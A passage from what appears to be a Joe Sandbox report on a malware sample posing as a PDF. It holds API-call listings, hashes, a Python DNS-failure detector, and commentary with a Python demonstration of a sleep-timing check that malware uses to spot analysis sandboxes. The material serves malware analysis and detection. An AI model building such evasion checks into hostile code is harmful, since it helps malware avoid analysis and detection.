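RECORD = re.compile(r"Image=(\S+)\s+QueryName=(\S+)\s+QueryStatus=(\d+)")


def lookup_stats(lines):
    """Per image: total lookups, failed lookups and the set of distinct names."""
    stats = defaultdict(lambda: {"total": 0, "failed": 0, "names": set()})
    for line in lines:
        m = RECORD.search(line)
        if not m:
            continue  # blank or unrelated line
        image, name, status = m.group(1), m.group(2), int(m.group(3))
        entry = stats[image]
        entry["total"] += 1
        entry["names"].add(name.lower())
        if status != 0:
            entry["failed"] += 1
    return stats


def flag_failed_lookup_bursts(lines, min_distinct=5, min_fail_ratio=0.8):
    """Images that queried at least min_distinct names with a failure share of
    min_fail_ratio or more. Both thresholds are illustrative, not tuned."""
    hits = []
    for image, s in lookup_stats(lines).items():
        if len(s["names"]) >= min_distinct and s["failed"] / s["total"] >= min_fail_ratio:
            hits.append(image)
    return sorted(hits)


if __name__ == "__main__":
    for image in flag_failed_lookup_bursts(SAMPLE_LOG.splitlines()):
        s = lookup_stats(SAMPLE_LOG.splitlines())[image]
        print(f"{image}: {s['failed']}/{s['total']} lookups failed over {len(s['names'])} names")
```

Counting distinct names rather than raw queries keeps a single retried lookup from tripping the rule, and a browser with one typo stays well under both thresholds; in practice the thresholds should be set from the baseline NXDOMAIN rate of the environment.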
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 007A9043
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A9055
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A906B
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A9086
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: b2ec43b8292275d7a6d680c9bb51f910e9258b5c544ca2b1e551a806265ba7e7
• Instruction ID: b255b29c42a3f2ff5696638f70787a636332a005dea8ce401b7c47a76626ff85
• Opcode Fuzzy Hash: b2ec43b8292275d7a6d680c9bb51f910e9258b5c544ca2b1e551a806265ba7e7
• Instruction Fuzzy Hash: 75115E79901219FFDB10DFA5CC84EAEFB74FB48350F204195EA04B7290D671AE10DB94
APIs
  • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
• DefDlgProcW.USER32(?,00000020,?), ref: 007512D8
• GetClientRect.USER32(?,?), ref: 0078B84B
• GetCursorPos.USER32(?), ref: 0078B855
• ScreenToClient.USER32(?,?), ref: 0078B860
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: fbf0ea78ba115174375f1edf08bf0d92a0b043aeebcbe76238e613f2cee69d44
• Instruction ID: b9e25618fcf86c4740fd974aff9d66b6eafff81fe07251abb4a33595b1a631f6
• Opcode Fuzzy Hash: fbf0ea78ba115174375f1edf08bf0d92a0b043aeebcbe76238e613f2cee69d44
• Instruction Fuzzy Hash: 49112B35601019FFCB00DF94D889AFE77B8FB05302F404456F942E7151D778AA55CBA5
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B166F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B1694
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B169E
• Sleep.KERNEL32(?,?,?,?,?,?,?,007B01FD,?,007B1250,?,00008000), ref: 007B16D1
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: 0d3c440c35f1b8aa9b414f2205d77410b70cfb60fee0648ceeccc68110e8281d
• Instruction ID: 7dc9bea4128cc5b0ab61599990301dab7ec2c55e6a91e0d6c7104fadf6cb48cb
• Opcode Fuzzy Hash: 0d3c440c35f1b8aa9b414f2205d77410b70cfb60fee0648ceeccc68110e8281d
• Instruction Fuzzy Hash: 94115A31C0152CEBCF009FA5D858BEEBB78FF09751F848056E941B2240CF3955608B96
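Two QueryPerformanceCounter reads with Sleep calls between them is the shape of a sleep-timing check: when the interval the high-resolution clock reports is clearly shorter than the sleep that was requested, the sleep was shortened or hooked, which is how many analysis sandboxes accelerate execution. Whether this particular function uses its measurement that way is not stated in the report (the first Sleep has argument 0, a yield; the second's argument is unresolved). The block below is an added example, not from the report, showing the check itself, written portably with time.perf_counter() in place of QueryPerformanceCounter and time.sleep() in place of Sleep; capped_sleep is a constructed stand-in for a sandbox hook, and the 0.9 tolerance is an arbitrary choice.

```python
# Added example (not from the Joe Sandbox report): the sleep-timing check that a
# QueryPerformanceCounter / Sleep / QueryPerformanceCounter bracket enables,
# written with the portable equivalents time.perf_counter() and time.sleep().
import time


def measure_sleep(requested_s, sleep_fn=time.sleep, clock=time.perf_counter):
    """One sleep bracketed by two clock reads; returns (requested, observed)."""
    t0 = clock()
    sleep_fn(requested_s)
    return requested_s, clock() - t0


def sleep_was_accelerated(requested_s, sleep_fn=time.sleep,
                          clock=time.perf_counter, tolerance=0.9):
    """True when the sleep returned noticeably earlier than requested.
    tolerance=0.9 is an arbitrary margin for scheduler and clock jitter."""
    _, observed = measure_sleep(requested_s, sleep_fn, clock)
    return observed < requested_s * tolerance


def probe_sleep_schedule(durations, sleep_fn=time.sleep,
                         clock=time.perf_counter, tolerance=0.9):
    """Check several sleep lengths. A hook that only shortens long sleeps shows
    up as a short duration that is honest next to a longer one that is not."""
    return {d: sleep_was_accelerated(d, sleep_fn, clock, tolerance) for d in durations}


def capped_sleep(cap_s):
    """Constructed stand-in for a sandbox hook that never sleeps longer than cap_s."""
    return lambda s: time.sleep(min(s, cap_s))


if __name__ == "__main__":
    print("honest sleep:", probe_sleep_schedule([0.002, 0.1]))
    print("capped sleep:", probe_sleep_schedule([0.002, 0.1], sleep_fn=capped_sleep(0.005)))
```

The defence side follows from the same arithmetic: a sandbox that shortens sleeps must also advance whatever clock the sample reads by the skipped amount, so analysts should look at which time sources a sample consults (here QueryPerformanceCounter) and make sure all of them are kept consistent with the accelerated sleep.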
APIs
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction ID: 9aa422e2f0607389776573d5b88dead8f402113a87a0a07659d03b4a254e7c37
• Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction Fuzzy Hash: DE01433608414AFBCF5A6E84CC458EE3F72BF59351B648515FA1998031D33BC9B1EB81
APIs
• GetWindowRect.USER32(?,?), ref: 007DB59E
• ScreenToClient.USER32(?,?), ref: 007DB5B6
• ScreenToClient.USER32(?,?), ref: 007DB5DA
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007DB5F5
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: 10824d24211a97f6c2b77614808fc345265d0b7faf6651d70acc2bdd66947362
• Instruction ID: d310bb6b642409b2e54993d1b142aff6d1dc8537dfa5d1333ff0cf95f9bf342e
• Opcode Fuzzy Hash: 10824d24211a97f6c2b77614808fc345265d0b7faf6651d70acc2bdd66947362
• Instruction Fuzzy Hash: 511166B5D00209EFDB01CF99D4449EEFBB5FB08310F108166E955E3620D735AA618F50
APIs
• _memset.LIBCMT ref: 007DB8FE
• _memset.LIBCMT ref: 007DB90D
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00817F20,00817F64), ref: 007DB93C
• CloseHandle.KERNEL32 ref: 007DB94E
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID:
• API String ID: 3277943733-0
• Opcode ID: c77a563af195d7fdcb1079f7fa620fb2d91a260dadc99d3f7475d85561ed07cb
• Instruction ID: f362c59e6495b2b1db75f86217fa207c27d28053941eb8d2465ca231bebb9a71
• Opcode Fuzzy Hash: c77a563af195d7fdcb1079f7fa620fb2d91a260dadc99d3f7475d85561ed07cb
• Instruction Fuzzy Hash: 85F05EB2544300BBE6102765AC09FFB3AADFF08794F008025FB09D5292DB79990187A9
                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 007B6E88
                                                                                                                        • Part of subcall function 007B794E: _memset.LIBCMT ref: 007B7983
                                                                                                                      • _memmove.LIBCMT ref: 007B6EAB
                                                                                                                      • _memset.LIBCMT ref: 007B6EB8
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 007B6EC8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 48991266-0
                                                                                                                      • Opcode ID: 4c1110f9ea4ff7262569a617c75638654f5ed87af0fbf0471c278fbfeade66d3
                                                                                                                      • Instruction ID: 72fe1ae14348ee338f6c09307bf4c1809ff6c012ffa408556d3f52346de034a9
                                                                                                                      • Opcode Fuzzy Hash: 4c1110f9ea4ff7262569a617c75638654f5ed87af0fbf0471c278fbfeade66d3
                                                                                                                      • Instruction Fuzzy Hash: A7F05E3A200200EBCF016F55DC89F8ABB2AFF45360B04C061FE095E22AC739A911DBB5
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007512F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
                                                                                                                        • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075135C
                                                                                                                        • Part of subcall function 007512F3: BeginPath.GDI32(?), ref: 00751373
                                                                                                                        • Part of subcall function 007512F3: SelectObject.GDI32(?,00000000), ref: 0075139C
                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007DC030
                                                                                                                      • LineTo.GDI32(00000000,?,?), ref: 007DC03D
                                                                                                                      • EndPath.GDI32(00000000), ref: 007DC04D
                                                                                                                      • StrokePath.GDI32(00000000), ref: 007DC05B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1539411459-0
                                                                                                                      • Opcode ID: 658ff77657b94eac6e613fe9009b9572dfcb7b5ed41be0fb211a46e1f9f3cbb3
                                                                                                                      • Instruction ID: 7c8a3a972f8f3255e633783811d3b50b3485c065f8b9d6840bc04c4788fdca93
                                                                                                                      • Opcode Fuzzy Hash: 658ff77657b94eac6e613fe9009b9572dfcb7b5ed41be0fb211a46e1f9f3cbb3
                                                                                                                      • Instruction Fuzzy Hash: 96F05E3114225AFBDB136F54AC0AFCE3F69BF05311F18C012FA12621E2C7B95665CB99
                                                                                                                      APIs
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007AA399
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 007AA3AC
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 007AA3B3
                                                                                                                      • AttachThreadInput.USER32(00000000), ref: 007AA3BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2710830443-0
                                                                                                                      • Opcode ID: a8bc07656948f4a814a5490ef905568b31fcfd47c2f4c424ce44d003cfe2be49
                                                                                                                      • Instruction ID: fbc6b7cf1626eba363c444e1bda8ec10f3ebbe660d365946df2e0d7181839f90
                                                                                                                      • Opcode Fuzzy Hash: a8bc07656948f4a814a5490ef905568b31fcfd47c2f4c424ce44d003cfe2be49
                                                                                                                      • Instruction Fuzzy Hash: 83E0C931546228BADB205FA2DC0DEE77F6CEF167A1F048126F50A95460C77AC540DBA5
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000008), ref: 00752231
                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 0075223B
                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00752250
                                                                                                                      • GetStockObject.GDI32(00000005), ref: 00752258
                                                                                                                      • GetWindowDC.USER32(?,00000000), ref: 0078C0D3
                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0078C0E0
                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0078C0F9
                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0078C112
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0078C132
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0078C13D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1946975507-0
                                                                                                                      • Opcode ID: 6a289215e7156f1b18ac62af9f3754e43af0585235b2a9625f07f1754f2269dd
                                                                                                                      • Instruction ID: 592ed5365718fc2e65e0901702fcf2050a13c80c7e841c288c9780cd2b08501d
                                                                                                                      • Opcode Fuzzy Hash: 6a289215e7156f1b18ac62af9f3754e43af0585235b2a9625f07f1754f2269dd
                                                                                                                      • Instruction Fuzzy Hash: 3FE06531540248EADB215F64FC0D7D83B20EB05332F04C367FA6A880E187764594DB21
                                                                                                                      APIs
                                                                                                                      • GetCurrentThread.KERNEL32 ref: 007A8C63
                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,007A882E), ref: 007A8C6A
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007A882E), ref: 007A8C77
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,007A882E), ref: 007A8C7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3974789173-0
                                                                                                                      • Opcode ID: 0532320b2fd92ec9a0bb3672ed73ab8f17fba454792c34f656e0c0ec10d8b32c
                                                                                                                      • Instruction ID: e4c69986a3c7c95877fe52438789d1ca0f5266c372e07945ba9716d33610f31b
                                                                                                                      • Opcode Fuzzy Hash: 0532320b2fd92ec9a0bb3672ed73ab8f17fba454792c34f656e0c0ec10d8b32c
                                                                                                                      • Instruction Fuzzy Hash: 07E04F366432119BD7605FB06E0CB563BB8AF51BA2F09C869E246CA040DA3884418B65
                                                                                                                      APIs
                                                                                                                      • GetDesktopWindow.USER32 ref: 00792187
                                                                                                                      • GetDC.USER32(00000000), ref: 00792191
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007921B1
                                                                                                                      • ReleaseDC.USER32(?), ref: 007921D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      • Opcode ID: 821f079b362de2e0c981e866eb80417a2b19784eeca311226b7105448dce3e1f
                                                                                                                      • Instruction ID: 54a21f0a7d9531e628fad1dcf01c4d0da4ef1071eb70253f05409471b0d44c9e
                                                                                                                      • Opcode Fuzzy Hash: 821f079b362de2e0c981e866eb80417a2b19784eeca311226b7105448dce3e1f
                                                                                                                      • Instruction Fuzzy Hash: 11E0CAB5801208EFDB01AFA0D808AAD7BB1EB4C351F10C42AE95AA7620CB7C82429F45
                                                                                                                      APIs
                                                                                                                      • GetDesktopWindow.USER32 ref: 0079219B
                                                                                                                      • GetDC.USER32(00000000), ref: 007921A5
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 007921B1
                                                                                                                      • ReleaseDC.USER32(?), ref: 007921D2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2889604237-0
                                                                                                                      • Opcode ID: cbaf2f29604023c9c95d0d1f567826ed2f6508e04335e1e4227ebf3460275e8c
                                                                                                                      • Instruction ID: 8b29249524a1df68e058ca2cf7166af5b05e9f95cea6172fd591891a26551f88
                                                                                                                      • Opcode Fuzzy Hash: cbaf2f29604023c9c95d0d1f567826ed2f6508e04335e1e4227ebf3460275e8c
                                                                                                                      • Instruction Fuzzy Hash: CBE0EEB5801204EFCB01AFA0CC0869D7BF1EB4C311F10C42AF95AA7620CB7C92419F44
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID:
• String ID: %~
• API String ID: 0-3145668672
• Opcode ID: 59a5892b3f507a2256b6f04b1face8cd84ae9fff4a6e43f194d3f7efce5458e5
• Instruction ID: 1c51f1b87874b807c615f98aebcaa72d86ae0b5aad3801cec12ec6fc06312ad2
• Opcode Fuzzy Hash: 59a5892b3f507a2256b6f04b1face8cd84ae9fff4a6e43f194d3f7efce5458e5
• Instruction Fuzzy Hash: EDB1B271900109DBCF14EF94C4959FDB7B4FF44312F90402AED06A7295EBB89E9ACB91
APIs
  • Part of subcall function 0076FEC6: _wcscpy.LIBCMT ref: 0076FEE9
  • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
  • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
• __wcsnicmp.LIBCMT ref: 007BB298
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007BB361
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
• Opcode ID: a751b6d52844ce34c7809422648f2dc7f3082be36ad6c437f9638add9ebb8d46
• Instruction ID: 7901a228d66b9a402db53e2ee9007dde1e87a40c7449354d4283d9ffb3737d93
• Opcode Fuzzy Hash: a751b6d52844ce34c7809422648f2dc7f3082be36ad6c437f9638add9ebb8d46
• Instruction Fuzzy Hash: E6614E75A00215EFCB14DF94C885EEEB7F4EB48310F15805AF946AB291DBB8AE44CB50
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
